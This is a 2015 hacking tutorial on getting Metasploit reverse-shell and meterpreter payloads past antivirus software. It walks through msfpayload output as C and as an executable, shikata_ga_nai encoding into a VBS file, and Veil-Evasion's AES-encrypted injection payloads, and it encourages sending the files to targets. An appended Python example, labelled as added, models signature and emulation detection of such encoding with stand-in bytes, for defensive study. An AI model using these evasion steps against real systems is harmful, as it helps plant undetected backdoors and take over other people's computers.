
Tutorial: Evading Anti-Virus Software While Hacking


By: Akash Raghav M

June 22, 2015

Hello,

When it comes to "hacking" into our target's system, where most of us fail is evading their Anti-Virus (AV). In this tutorial, I'll be teaching you various ways to bypass the AV, so you can have a meterpreter session running on your target's system without the Anti-Virus flagging your software.

AV software companies generally develop their software to look for a "signature" of viruses and other malware. In most instances, they look at the first few lines of code for a familiar pattern of known malware. When they find malware in the wild, they simply add its signature to their virus/malware database. When the AV software next encounters that malware, it alerts the computer owner.

First, the prerequisites:

1. Kali Linux
2. A quick scan of the target's AV (what AV are they using, etc.)

Let's get started!

METHOD 1: Changing the Payload into a C Program

In this method, we're going to exploit the target's system by changing our Metasploit payload into a C language payload so that the AV won't flag it as suspicious.

STEP 1: Open up Kali and run msfconsole

STEP 2: Generate an exploit in C

We're going to generate an exploit in C:

msfpayload windows/shell/reverse_tcp LHOST= LPORT=4441 C

Notice I've appended the command with a capital "C". This C tells the console to generate this payload in C. Once we've done that, we get the payload printed as a C byte array.

STEP 3: Generating a Binary

Finally, we need to generate a binary executable for the shellcode, which we can use in our client-side attack:

msfpayload windows/shell/reverse_tcp LHOST= X > setup.exe

We've created an executable file by using the X option, written it to the current folder and named it setup.exe.

We can use this new payload in a client-side attack. The target's AV software is unlikely to have a signature for it, allowing us to stealthily place this backdoor/listener on their system.
METHOD 2: Encoding our Payload

We're going to change our signature by encoding it. So, let's get started.

STEP 1: Fire up Kali and run msfconsole

STEP 2: Using msfencode

Let's run msfencode -l to view the list of encoders available to us. We can see a lot of encoders. Fourth from the bottom, you can see an encoder named "shikata_ga_nai". Note: it's rated "excellent" and it's a "Polymorphic XOR Additive Feedback Encoder". Let's use that one.

What's shikata_ga_nai? This Japanese phrase translates to "nothing can be done about it." Great name for an encoder, huh? Further, it's an additive XOR polymorphic encoder. This means that it will change its shape/signature (polymorphic) by using an XOR encrypting scheme. XOR is far from a perfect encryption scheme, but it's efficient and can generate multiple shapes/signatures quickly that can be decrypted by the code itself once it arrives at the target.

STEP 3: Re-encoding our Payload with the encoder

Let's use shikata_ga_nai to re-encode our reverse TCP shell to get it past AV software. In MSF we type:

msfpayload windows/shell/reverse_tcp LHOST= R | msfencode -e x86/shikata_ga_nai -c 20 -t vbs > /root/cybrary_it.vbs

Here, "|" pipes the raw payload (the R option) into msfencode with the following extra parameters: msfencode -e x86/shikata_ga_nai -c 20 -t vbs means re-encode that payload with shikata_ga_nai, run the encoder 20 times (-c 20), and then output it as a .vbs script (-t vbs). Finally, save it in /root with the file name cybrary_it.vbs. When we check our root folder, we find the new file.

It's just a matter of minutes to send the file to our target and have them open it, and boom, we've got their system.

METHOD 3: Using Veil-Evasion

In this final method (of this tutorial - I can't post all 50 methods, LOL) we're going to evade the AV one last time by using Veil-Evasion. Veil-Evasion was specifically developed to enable you to change the signature of your payload.
It is written in Python, but has numerous encoders to enable you to rewrite your code to evade detection in multiple ways.

STEP 1: Installing Veil-Evasion

First, we're going to install it. Type:

root@kali > apt-get install veil-evasion

STEP 2: Opening Veil-Evasion

To open our recently installed Veil-Evasion, just type:

root@kali > veil-evasion

When we type that, Veil will begin its setup. It will ask you whether you want to install dependencies; type "Y" for yes. Next, Veil-Evasion will begin to download all its dependencies. This can take a while, so be patient. Eventually, Veil-Evasion will ask you whether you want to install Python for Windows. Select "Install for all users" and click the "Next" button. Continue to click "Next" through several screens until you finally come to a window with the "Finish" button. Click it. Eventually, you will arrive at the Veil-Evasion main screen. We're ready to use Veil-Evasion to create a nearly undetectable payload.

STEP 3: Creating an EXE Payload

Let's type "list", as this will list all of the payloads that Veil-Evasion can work with.

STEP 4: Choosing a Payload

In this case, let's use ruby/meterpreter/rev_tcp, or number 44. Let's type:

> use 44

When we do so, Veil-Evasion will come back with a screen asking us to set the options. We'll need to set LHOST and LPORT:

> set LHOST
> set LPORT 4444

Of course, use the appropriate IP address and port for your circumstances. Next, we need to tell Veil-Evasion to generate the executable.

> generate

Veil-Evasion has generated a new .exe file that I have named "newpayload.exe".

STEP 5: Generating an encrypted Payload to bypass AV

Next, let's attempt to create an encrypted payload that we can get past AV software and other security devices. In this case, we'll use a different payload from the payload list, namely python/shellcode_inject/aes_encrypt. This payload type uses VirtualAlloc injection, which creates an executable area in memory for the shellcode and then locks that memory area in physical memory. This is number 32 on our payload list, so type:

> info 32

It then returns info on this payload. This payload uses VirtualAlloc injection in conjunction with AES encryption (AES is the Advanced Encryption Standard, generally regarded as among the strongest encryption available) to obfuscate its true nature from AV software and other security devices. Next, let's tell Veil-Evasion we want to use this payload.

> use 32

Here, we have the option to change the default options if we care to. For now, let's leave the default options as they are. Then, let's tell Veil-Evasion we want to generate this encrypted payload:

> generate

When we do so, it will use the default payload windows/meterpreter/reverse_tcp and then prompt us for the LHOST and LPORT. When we finish entering the appropriate information for our payload, it will begin to generate the shellcode. This can take a few minutes, so be patient. Next, Veil-Evasion will prompt us for what we want to name our payload. You can use whatever name your heart desires, but I used the simple "veilpayload". Finally, Veil-Evasion will complete its work and present us with the finished product.

Summary:

There are a lot of ways you can bypass an AV. These are the methods most used by me and my team. If you are stuck on any method or if you have any suggestions/comments/queries, feel free to message me ;)

-- xMidnightSnowx
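The signature model from the introduction and the XOR additive-feedback encoding of Method 2, modelled from the detection side as an added example that is not part of the original tutorial: the payload, the signature and the decoder stub are constructed stand-ins (no real shellcode), and the encoder is a simplified model of the scheme rather than shikata_ga_nai itself. It shows why a raw-byte signature on the body stops matching once the body is encoded, while the decoder that must precede it stays in cleartext and an emulating scanner that peels the layers still finds the body.

```python
import os

# Constructed stand-ins (no real shellcode): a "known malware" body, the
# byte pattern an AV signature database would hold for it, and a marker
# standing in for the cleartext decoder stub that any self-decoding
# payload must carry so it can undo the encoding at run time.
PAYLOAD = b"CONNECT_BACK(10.0.0.1:4444);SPAWN_SHELL();"
BODY_SIGNATURE = b"CONNECT_BACK("
DECODER_STUB = b"<decoder-stub>"


def xor_feedback(data: bytes, key: int, decode: bool = False) -> bytes:
    """One XOR additive-feedback pass: XOR each byte with a running key,
    then fold the plaintext byte into the key, so the key changes per byte."""
    out, k = bytearray(), key
    for b in data:
        o = b ^ k
        out.append(o)
        k = (k + (o if decode else b)) & 0xFF  # plaintext byte drives the key
    return bytes(out)


def encode_layers(payload: bytes, rounds: int) -> bytes:
    """Model of 'msfencode -c N': wrap the body N times with a fresh random
    key each time; every layer is [stub][key byte][encoded inner layer]."""
    blob = payload
    for _ in range(rounds):
        key = os.urandom(1)[0]
        blob = DECODER_STUB + bytes([key]) + xor_feedback(blob, key)
    return blob


def peel_layers(blob: bytes) -> bytes:
    """What an emulating scanner (or the payload itself at run time) does:
    strip each decoder layer and undo its XOR pass until the body is bare."""
    while blob.startswith(DECODER_STUB):
        key = blob[len(DECODER_STUB)]
        blob = xor_feedback(blob[len(DECODER_STUB) + 1:], key, decode=True)
    return blob


def scan(blob: bytes) -> dict:
    """Three detection strategies applied to the same bytes."""
    return {
        "body_signature": BODY_SIGNATURE in blob,       # raw bytes only
        "decoder_signature": DECODER_STUB in blob,      # stub is never encoded
        "emulated_body": BODY_SIGNATURE in peel_layers(blob),
    }
```

Two calls to encode_layers(PAYLOAD, 20) give different bytes for the same body (the polymorphism the tutorial describes), yet scan() reports the decoder signature and the emulated body hit on both, which is why a signature on the decoder stub or an emulation pass, not a signature on the encoded body, is what catches this class of encoding.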